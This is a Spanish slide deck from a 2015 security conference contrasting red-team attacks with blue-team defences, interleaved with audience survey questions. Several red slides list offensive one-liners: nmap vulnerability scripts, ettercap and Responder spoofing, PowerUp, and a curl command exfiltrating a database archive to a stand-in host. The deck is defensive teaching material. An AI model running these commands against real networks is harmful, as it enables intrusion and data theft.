Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
1 recomendación3,164 vistas
El documento detalla un ejercicio colaborativo entre dos equipos, rojo y azul, que aborda la seguridad ofensiva y defensiva a través de encuestas sobre metodologías como 'Assume Breach'. Se discuten las tácticas de ataque y defensa, incluyendo métricas de tiempo para comprometer y detectar vulnerabilidades, así como soluciones para mitigar riesgos. También se abordan temas específicos de ataques cibernéticos y se presentan recomendaciones claras para mejorar la seguridad de las infraestructuras.
Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores
- 1. Rojos/Azules: dos equipos con dos sabores Alejadro Ramos - 2015
- 2. Introducción. • Modo colaborativo. • Se introducirá un tema y hacemos encuesta vía web. • Al acabar vemos las respuestas y opinamos sobre ellas. • Se espera vuestra participación (!!) • Para que tenga sentido, vamos haciendo el test todos a la vez. URL: http://secby.me/redblueteam
- 3. • Fecha de creación: lunes, 02 de marzo de 2015 274 • Respuestas totales • Respuestas completas: 182
- 4. Metodología: Assume Breach (Microsoft) Metodología que da por perdida la primera parte de la batalla, consiste en detectar gaps en las siguientes tácticas, técnicas y procedimientos (TTP): • Detección de ataques y penetraciones. • Respuesta a los ataques y penetraciones. • Recuperación de la fuga, modificación o compromiso de información. • Prevención de futuros ataques y penetración.
- 5. ¿Qué es para ti un Red Team?
- 6. Q1: ¿Qué es para ti un red team? • Respondido: 273 Omitido: 1
- 7. Q1: ¿Qué es para ti un red team? • Respondido: 273 Omitido: 1
- 9. Q2: ¿Seguridad ofensiva? • Respondido: 267 Omitido: 7
- 10. Q2: ¿Seguridad ofensiva? • Respondido: 267 Omitido: 7
- 11. Red Team. The Red Team is a group of full-time staff within <company> that focuses on breaching client infrastructure, platform and client own tenants and applications. They are the dedicated adversary (a group of ethical hackers) performing targeted and persistent attacks. - Microsoft Objetivo medible mediante: • Tiempo medio para comprometer - Mean Time to Compromise (MTTC) • Tiempo medio para escalar privilegios o pwnage - Mean Time to Privilege Escalation or “Pwnage” (MTTP)
- 12. ¿Qué es para ti un Blue Team?
- 13. Q3: ¿Qué es para ti un blue team? • Respondido: 260 Omitido: 14
- 14. Q3: ¿Qué es para ti un blue team? • Respondido: 260 Omitido: 14
- 16. Q4: ¿Seguridad defensiva? • Respondido: 257 Omitido: 17
- 17. Q4: ¿Seguridad defensiva? • Respondido: 257 Omitido: 17
- 18. Blue Team. The Blue Team is comprised of either a dedicated set of security responders or members from across the security incident response, Engineering and Operations organizations. -Microsoft Objetivo medible mediante: • Tiempo medio de detección - Mean-Time to Detect (MTTD) • Tiempo medio de recuperación - Mean-Time to Recovery (MTTR) Predecir Prevenir Detectar Responder
- 20. Q5: ¿SQLMap o de mod_security? • Respondido: 257 Omitido: 17
- 21. Q5: ¿SQLMap o de mod_security? • Respondido: 257 Omitido: 17
- 22. Así están las cosas para los azules.
- 23. MTTC/MTTP Top 6 ataques MTTD/MTTR Top 6 defensas Desde una perspectiva de ejercicio con escenario interno.
- 24. Red Top 1/6: Credenciales. • WTF. Lo mismo de siempre, 30 años después. • Por eso sigue en el Top. • Ejemplos: • Contraseñas en el Group Policy Preferences. • Contraseñas en los comentarios de un usuario del directorio activo. • SQL Server sa/<blank> Oracle: SYSTEM/MANAGER • Marzo2015 o similares como contraseña en AD. • Y eso, si no hay un xls con todas las passwords en una carpeta pública en un file server… 5 mins pwnage: • nmap -p 1433 --script ms-sql-empty-password
- 25. Blue Top 1/6: Credenciales. Soluciones complejas (… por eso sigue en el top …) • Robustecer “Passfilt.dll” de Windows con aplicación de terceros. • Sistemas de salto “jumpbox” monitorizados. • Soluciones de doble factor de autenticación. • Aplicar acceso 4eyes a contraseñas sensibles / OTP • “Honeyusers” con usuarios que únicamente ejecutan alertas. • Monitorización exhaustiva de logins fallidos. • Gestión de Identidades. • Políticas de contraseñas, Captchas, bloqueos, etc…
- 26. ¿Solución a las contraseñas?
- 27. Q6: ¿Solución a las contraseñas? • Respondido: 252 Omitido: 22
- 28. Q6: ¿Solución a las contraseñas? • Respondido: 252 Omitido: 22
- 29. Red Top 2/6: Vulnerabilidades en aplicaciones. • Exploits conocidos o por conocer. • Ejemplos: • shellshock, heartbleed, jetleak… • Los XP que quedan por ahí muertos. • Java/Flash. • Software de backup. • Webs con RCE/LFI, etc. 5 mins pwnage: • nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 … • nmap -p 443 --script ssl-heartbleed … • Metasploit … • ./exploit-db.py
- 30. Blue Top 2/6: Vulnerabilidades en aplicaciones. • Arquitectura de red: segmentación de red, reglas en firewall internos. • Uso de IPS. • Despliegue automático de parches: • Windows: SCCM/WSUS . • Linux: Satellite/Spacewalk/Landscape • chef/puppet/salt, etc • EMET - Enhanced Mitigation Experience Toolkit. • Grsecurity. • Controles en navegación. Ej: alertas con User-Agents específicos de Java. • Vulnerability Scans y Revisiones de cumplimiento.
- 31. ¿Método DELETE, PUT en un servidor web?
- 32. Q7: Te encuentras el método DELETE y PUT habilitado en un servidor web. • Respondido: 246 Omitido: 28
- 33. Q7: Te encuentras el método DELETE y PUT habilitado en un servidor web. • Respondido: 246 Omitido: 28
- 34. Red Top 3/6: Ataques de red. • Ataques Man In The Middle en sus 300 formas. • Ejemplos: • ARP Spoofing. • WPAD Poisoning, LLMNR Poisoning. • DHCP Spoofing. • Rogue/Fake AP 5 mins pwnage: • ettercap -T -q -i eth0 -M arp:remote /192.168.1.69/ /192.168.1.1/ • Responder -i 192.168.1.100 -wrf • ettercap -Tq -M dhcp:/255.255.255.0/192.168.1.1 Imagen de: http://www.sternsecurity.com/
- 35. Blue Top 3/6: Ataques de red. • Aplicación de Network Access Control. • Configuración de Dynamic ARP Inspection. • Habilitar DHCP Snooping. • El uso de protocolos cifrados. • Desactivar IPv6. • Desactivar Multicast Name Resolution. • Evitar el uso de WPAD • Implantar Wireless intrusion detection system • Segmentación de red. • Firewall / IPS
- 36. ¿Están superados los ataques de red?
- 37. Q8: ¿Están superados los ataques de red internos? • Respondido: 244 Omitido: 30
- 38. Q8: ¿Están superados los ataques de red internos? • Respondido: 244 Omitido: 30
- 39. Red Top 4/6: Privilegios • De usuario guarrete a local admin, de local admin a domain admin y de ahí al infinito. • Ejemplos: • Servicios con permisos incorrectos. • Binarios en local o servidores de ficheros con permisos incorrectos. • Uso de usuarios de aplicación privilegiados. • Usuarios del dominio con privilegios de Local Admin. • sudo demasiado permisivo. 5 mins pwnage: • PowerUp.ps1: Invoke-AllChecks • Sticky keys • Kon-Boot
- 40. Blue Top 4/6: Privilegios. • Eliminar acceso al cmd y powershell. • Meter en el registro una entrada no aceptando el EULA de sysinternals (y proteger sus permisos). • Activar UAC/Firewall de Windows. • Permisos en las tareas programadas. • Uso de listas blancas de binarios, comprobación de firmas, AppLocker, etc. • Eliminar acceso a USB/CD (bios) • Cifrar contenido del disco duro, bitlocker y similares.
- 41. En tu empresa, ¿Tienes administrador local de tu PC?
- 42. Q9: En tu empresa, ¿Tienes administrador local de tu PC? • Respondido: 242 Omitido: 32
- 43. Q9: En tu empresa, ¿Tienes administrador local de tu PC? • Respondido: 242 Omitido: 32
- 44. Red Top 5/6: In/Exfiltración • Introducir o exportar información de la red. Documentos, herramientas o cualquier otro tipo de fichero. • Ejemplos: • Mediante HTTP por el proxy. • Correos electrónicos. • Túneles DNS. • IM 5 mins pwnage: • curl --data-binary @mi_bbdd.zip http://muaha.net/upload.php
- 45. Blue Top 5/6: In/Exfiltración. • Inspección de SSL en navegación. • Bloqueo de categorías tipo hacking, malware, etc. • Bloquear la descarga de ejecutables y derivados. • En caso de dominios no conocidos, página de bienvenida. • Bloqueo de dominios jóvenes, Ej <20 días. • Limitar peticiones POST, Ej cabeceras mayores de 50kb. • No resolver DNS de Internet desde las workstation. • Firmas específicas en IPS para túneles y otros covert channels. • Bloqueo o cifrado de USB. • Antivirus.
- 46. ¿Tu método favorito para mandar documentación confidencial a casa?
- 47. Q10: ¿Cuál es tu método favorito para mandar documentación confidencial a casa? • Respondido: 241 Omitido: 33
- 48. Q10: ¿Cuál es tu método favorito para mandar documentación confidencial a casa? • Respondido: 241 Omitido: 33
- 49. ¿Cuál tu top red 6?
- 50. ¿Cuál es tu top blue 6?
- 51. Gracias. Alejandro Ramos – Marzo 2015 www.securitybydefault.com / @aramosf http://secby.me/redbluerespuestas